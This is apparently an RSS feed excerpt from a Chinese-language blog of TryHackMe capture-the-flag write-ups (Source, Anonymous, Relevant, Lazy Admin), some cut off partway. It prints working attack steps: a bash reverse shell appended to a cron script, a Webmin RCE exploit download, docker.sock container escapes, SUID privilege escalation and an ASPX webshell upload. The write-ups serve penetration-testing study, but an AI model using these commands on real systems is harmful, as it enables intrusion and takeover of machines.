&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4085e-bdQQ18p.png"&gt;切換到賣口- &lt;code&gt;echo bash &amp;gt; script.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c813b-iVUL3es.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;再一次 Linpeas&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/78350-f2G9B5Q.png"&gt;發現 &lt;code&gt;/var/run/docker.sock&lt;/code&gt; 可以寫入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f338d-efcmkQI.png"&gt;&lt;/li&gt;
&lt;li&gt;直接給我們 Exploit 教學ㄌ，好棒https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket觀察目前有使用的 docker image- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e22f2-iEs6uIO.png"&gt;修改一下 image 的名字，使用 hacktricks 上面的 exploit 教學- &lt;code&gt;docker -H unix:///var/run/docker.sock run -v /:/host -it nginx chroot /host /bin/bash&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;docker -H unix:///var/run/docker.sock run -it --privileged --pid=host nginx nsenter -t 1 -m -u -n -i sh&lt;/code&gt;創建 privileged 康天呢提權成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/db827-SNmNk2S.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Source (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/16/source-try-hack-me-writeup/</link><pubDate>Mon, 16 Aug 2021 13:21:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/16/source-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/source"&gt;https://tryhackme.com/room/source&lt;/a&gt;&lt;br&gt;
IP : 10.10.63.154&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.63.154 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7dd97-I6kP0We.png"&gt;&lt;/li&gt;
&lt;li&gt;22&lt;/li&gt;
&lt;li&gt;10000&lt;code&gt;nmap -A -p22,10000 10.10.63.154&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/85a9c-XF4bSvw.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 10000 是 &lt;code&gt;MiniServ 1.890&lt;/code&gt;直接連上去- http://10.10.63.154:10000/&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ea2f1-cd1cvG2.png"&gt;發現它有綁 SSL 要用指定網址才能進&lt;code&gt;10.10.63.154 ip-10-10-63-154.eu-west-1.compute.internal&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;綁上 &lt;code&gt;/etc/hosts&lt;/code&gt;再次訪問- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f0aea-yyal9X9.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;透過版本可以查詢到 &lt;code&gt;MiniServ 1.890&lt;/code&gt; Exploithttps://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;python3 webmin-1.890_exploit.py&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bda70-MJV55av.png"&gt;&lt;/li&gt;
&lt;li&gt;ㄟ就直接拿到 root 了ㄟ&lt;/li&gt;
&lt;li&gt;太無聊ㄌㄅ = =懶得戳 Reverse shell ㄌ- 直接用這個類似 Webshell 的東西 早點打完收工ㄅ&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a3051-DBSTDZg.png"&gt;&lt;/li&gt;
&lt;li&gt;Root Flag&lt;code&gt;THM{UPDATE_YOUR_INSTALL}&lt;/code&gt;取 User Flag- 先看 home 使用者名稱&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a55c7-Cq4YNie.png"&gt;看使用者資料夾- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/54905-RRdc2bA.png"&gt;取得 Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/62d0d-E7Dcn37.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Anonymous (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/11/anonymous-try-hack-me-writeup/</link><pubDate>Wed, 11 Aug 2021 23:46:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/11/anonymous-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/anonymous"&gt;https://tryhackme.com/room/anonymous&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.142.45&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port 起手式&lt;code&gt;rustscan -a 10.10.142.45 -r 1-65535 --ulimit 5000&lt;/code&gt;22&lt;/li&gt;
&lt;li&gt;21&lt;/li&gt;
&lt;li&gt;139&lt;/li&gt;
&lt;li&gt;445&lt;code&gt;nmap -A -p21,22,139,445 10.10.142.45&lt;/code&gt;- 21 : FTPVSFTPD 2.0.822 : SSH139: SMB445: SMB&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2f21a-2TM1uMz.png"&gt;嘗試連接 ftp- &lt;code&gt;ftp 10.10.142.45&lt;/code&gt; 使用 anonymous 登入&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bf202-b7Qrl7f.png"&gt;&lt;/li&gt;
&lt;li&gt;發現裡面有一個 &lt;code&gt;scripts&lt;/code&gt; 資料夾先把裡面所有檔案都載下來&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d84b2-KsKVdo3.png"&gt;觀察檔案- &lt;code&gt;clean.sh&lt;/code&gt;看起來是一段 清除資料的 bash script&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2af44-4Lcnfv6.png"&gt;&lt;code&gt;removed_files.log&lt;/code&gt;- 看起來東西都是空的，是上述腳本的輸出&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/235b8-0mXudWi.png"&gt;&lt;code&gt;to_do.txt&lt;/code&gt;- 看起來沒有很重要&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e779e-PTl2P7B.png"&gt;嘗試連線 SMB- 發現有一個 pics 資料夾&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f182b-i7i7LGJ.png"&gt;裡面有兩張圖片- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4f4d3-WXjKMEq.png"&gt;把兩張圖片載下來- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e61db-ZRYflNb.png"&gt;觀察圖片- 看起來是狗勾!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ef648-jLqjCjO.png"&gt;用 Exif tool 觀察- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b9509-MSukA0V.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/239c2-rc3Z36u.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看出 Photoshop 編輯過後來還用了 &lt;code&gt;steghide&lt;/code&gt; 等程式，都沒有結果&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="嘗試-exploit"&gt;嘗試 Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;尋找到 Vsftpd 2.3.4 有 Exploithttps://www.exploit-db.com/exploits/49757&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget https://www.exploit-db.com/download/49757 -O 49757.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現他是 Anonymous only，所以這個 Exploit 不能用!!&lt;/li&gt;
&lt;li&gt;用了 msf 也是一樣的結果 QQ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/49929-P18sSV3.png"&gt;突然想到，說不定 ftp 上面的 &lt;code&gt;clean.sh&lt;/code&gt; 是一個 cron job- 我們既然有讀寫的權限，可以在上面戳個 reverse shell 再傳上去&lt;/li&gt;
&lt;li&gt;&lt;code&gt;echo bash -c &amp;quot;'bash -i &amp;gt;&amp;amp; /dev/tcp /10.13.21.55/7877 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; clean.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;本地端開 nc 來接成功接上ㄌ- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/94acc-0iyaFLU.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 User flag&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3f5ba-ysQnHSX.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 &lt;code&gt;sudo -l&lt;/code&gt;看起來沒東西 QQ&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a630b-m70zKKl.png"&gt;準備 Linenum- &lt;code&gt;wget 10.13.21.55:8000/LinEnum.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;掃到了 &lt;code&gt;/usr/bin/env&lt;/code&gt; 有 suid&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9c605-NhM5A75.png"&gt;透過 &lt;a href="https://gtfobins.github.io/gtfobins/env/#suid"&gt;GTFOBins&lt;/a&gt; 尋找 env SUID 提權- &lt;code&gt;/usr/bin/env /bin/sh -p&lt;/code&gt;成功提權- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f3cc8-qbMSXz6.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 Root Flag&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/33329-vsaOGRa.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="心得"&gt;心得&lt;/h2&gt;
&lt;p&gt;FTP 上面的檔案也有可能是 Cron Job，看到 shell 就優先懷疑它是 cron ，看看能不能戳一些東西上去。打 Exploit 前須要先確定一下他有沒有一些限制(FTP的不能是 Anonymous登入)。&lt;/p&gt;</description></item><item><title>Relevant (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/10/relevant-try-hack-me-writeup/</link><pubDate>Tue, 10 Aug 2021 13:13:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/10/relevant-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/relevant"&gt;https://tryhackme.com/room/relevant&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.115.198&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rustscan -a 10.10.115.198&lt;/code&gt;發現有開80&lt;/li&gt;
&lt;li&gt;135&lt;/li&gt;
&lt;li&gt;139&lt;/li&gt;
&lt;li&gt;445&lt;/li&gt;
&lt;li&gt;3389&lt;code&gt;nmap -A 10.10.115.198&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 01:58 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.115.198
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.28s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 995 filtered ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| http-methods:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Microsoft-IIS/10.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: IIS Windows Server
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;135/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;139/tcp open netbios-ssn Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3389/tcp open ssl/ms-wbt-server?
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| rdp-ntlm-info:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Target_Name: RELEVANT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS_Domain_Name: RELEVANT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS_Computer_Name: RELEVANT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| DNS_Domain_Name: Relevant
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| DNS_Computer_Name: Relevant
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Product_Version: 10.0.14393
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ System_Time: 2021-08-09T06:00:45+00:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssl-cert: Subject: commonName=Relevant
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Not valid before: 2021-08-08T05:57:43
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_Not valid after: 2022-02-07T05:57:43
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ssl-date: 2021-08-09T06:01:24+00:00; 0s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-os-discovery:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Computer name: Relevant
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS computer name: RELEVANT\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Workgroup: WORKGROUP\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ System time: 2021-08-08T23:00:47-07:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| account_used: guest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| authentication_level: user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| challenge_response: supported
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ message_signing: disabled (dangerous, but default)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 2.02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| date: 2021-08-09T06:00:49
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ start_date: 2021-08-09T05:58:06
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap done: 1 IP address (1 host up) scanned in 153.72 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;發現應該是 Winodws Server 2016 的機器&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="觀察網頁"&gt;觀察網頁&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;去看 80 Port&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bb235-Wz90g9G.png"&gt;&lt;/li&gt;
&lt;li&gt;是一個 IIS 的 Default Page掃目錄- &lt;code&gt;python3 dirsearch.py -u http://10.10.115.198/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b00de-Z5TN3wB.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來沒什麼結果&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="觀察-smb"&gt;觀察 SMB&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;smbclient --no-pass -L //10.10.115.198/&lt;/code&gt;可以觀察到有一個 &lt;code&gt;nt4wrksv&lt;/code&gt; 目錄&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2881b-8B5dC11.png"&gt;&lt;code&gt;smbclient -N //10.10.115.198/nt4wrksv&lt;/code&gt;- 就連上ㄌ&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c0159-BKiLHzJ.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get passwords.txt&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/94ded-GmGYudx.png"&gt;觀察 &lt;code&gt;passwords.txt&lt;/code&gt; 檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dbc81-0ruQyhn.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現是編碼過後的東西，後面有 &lt;code&gt;==&lt;/code&gt; 所以很明顯是 Base64&lt;code&gt;Qm9iIC0gIVBAJCRXMHJEITEyMw==&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk&lt;/code&gt;解 Base64- 可以用 &lt;code&gt;base64 -d 嘗試把帳密用 RDP 連線- &lt;/code&gt;xfreerdp +drives /u:Bob /v:10.10.115.198`&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xfreerdp +drives /u:Bill /v:10.10.115.198&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;但也都失敗ㄌQQ嘗試連線 SMB- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8ef44-0jHgQkI.png"&gt;&lt;/li&gt;
&lt;li&gt;但也都失敗了&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="搜尋更多的-port"&gt;搜尋更多的 Port&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rustscan -a 10.10.115.198 --accessible -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9c637-vASh02r.png"&gt;&lt;/li&gt;
&lt;li&gt;發現真的有藏東西!!&lt;code&gt;49669&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;49663&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;49667&lt;/code&gt;這邊我同時用 nmap 跑了一次，不過真的有夠慢QQ- &lt;code&gt;nmap -p- 10.10.115.198&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8b986-RMxh6CS.png"&gt;&lt;code&gt;nmap -A -p49669,49663,49667 10.10.115.198&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/35e2d-Ekzf2uB.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 49663 是一個 IIS webserver掃目錄- &lt;code&gt;python3 dirsearch.py -u http://10.10.115.198:49663/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;掃到 &lt;code&gt;aspnet_client&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/49fc6-Y8hxkis.png"&gt;&lt;/li&gt;
&lt;li&gt;搜尋發現 &lt;code&gt;aspnet_client/system_web&lt;/code&gt; 裡面常常會搭配一些特定字串https://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html?view=flipcard所以可以再依據字串掃一次- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d9d28-zMsZUx2.png"&gt;&lt;/li&gt;
&lt;li&gt;還真的掃到了 &lt;code&gt;4_0_30319&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="通靈掃描qq"&gt;通靈掃描QQ&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;不知道為什麼機器死掉ㄌ，重新開的 IP 是 &lt;code&gt;10.10.63.244&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;我們如果隨便訪問一個不存在的目錄，會回應404&lt;code&gt;curl -I http://10.10.63.244:49663/12334/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e71a2-o4SUzYj.png"&gt;通靈覺得，說不定 webroot 有剛才 smb 的資料夾?- &lt;code&gt;curl -I curl -I http://10.10.63.244:49663/nt4wrksv/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;200! 還真的有!!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/90164-S3zKRkv.png"&gt;那我們是不是能取得剛剛 &lt;code&gt;passwords.txt&lt;/code&gt; 的檔案- http://10.10.63.244:49663/nt4wrksv/passwords.txt&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5d11b-KSZpoMG.png"&gt;&lt;/li&gt;
&lt;li&gt;度ㄉ!!真的可以!!!!!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="準備-exploit"&gt;準備 Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;那我們應該可以用匿名登入的 smb 來上傳東西囉!準備一隻喵喵&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1d048-s4eBOpX.png"&gt;&lt;code&gt;smbclient -N //10.10.63.244/nt4wrksv&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b6bff-L6DIdNv.png"&gt;嘗試用瀏覽器訪問!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9f48e-kVrt6js.png"&gt;&lt;/li&gt;
&lt;li&gt;成功!!!既然他是 IIS ，又是 ASPX，那我們應該可以傳個 aspx 的 webshell?- 網路上隨便找了一ㄍhttps://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.aspx&lt;/li&gt;
&lt;li&gt;丟上去&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3129e-GALqpOA.png"&gt;可以ㄟ!!!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/af57d-WbsRzYu.png"&gt;&lt;/li&gt;
&lt;li&gt;好讚ㄛ可以看系統的資訊ㄌ- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f0fc-JDuWVj0.png"&gt;亂逛系統- 輸入指令 &amp;ldquo;cd &amp;hellip;&amp;hellip;\Users\Bob\Desktop &amp;amp;&amp;amp; dir&amp;rdquo;&lt;code&gt;![](https://i.imgur.com/hZrXxtO.png)&lt;/code&gt;取得 user flag- &lt;code&gt;&amp;quot;cd ..\..\..\Users\Bob\Desktop &amp;amp;&amp;amp; type user.txt&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2897e-GBnyp6o.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="戳-reverse-shell"&gt;戳 Reverse shell&lt;/h3&gt;
&lt;p&gt;雖然 Webshell 已經滿好用的了，但Reverse shell 用起來還是比較爽，我們來嘗試使用 Reverse shell&lt;br&gt;
下面提供了滿多我嘗試的方法，但大多數都失敗ㄌ，僅有最後一個成功，不過我把失敗的方法也都列出來&lt;/p&gt;</description></item><item><title>Lazy Admin Final (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/10/lazy-admin-final-try-hack-me-writeup/</link><pubDate>Tue, 10 Aug 2021 13:00:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/10/lazy-admin-final-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/lazyadmin"&gt;https://tryhackme.com/room/lazyadmin&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.40.99&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;根據套路，先掃 Port&lt;code&gt;nmap -A 10.10.40.99&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5334a-0Xc7KJW.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有開 80 跟 22觀察網頁- 80 port 是一個 Apaphe 在 Ubuntu 上的 Default page&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5294c-kSfBbQw.png"&gt;掃路徑- &lt;code&gt;python3 dirsearch.py -u http://10.10.40.99&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;掃到一個 &lt;code&gt;/content&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;http://10.10.40.99/content/上面寫說他是 &lt;code&gt;SweetRice CMS&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1ddeb-Fx2sPrS.png"&gt;根據 &lt;code&gt;/content&lt;/code&gt; 繼續掃會找到- 裡面有一個 Change Log&lt;/li&gt;
&lt;li&gt;http://10.10.40.99/content/changelog.txt&lt;/li&gt;
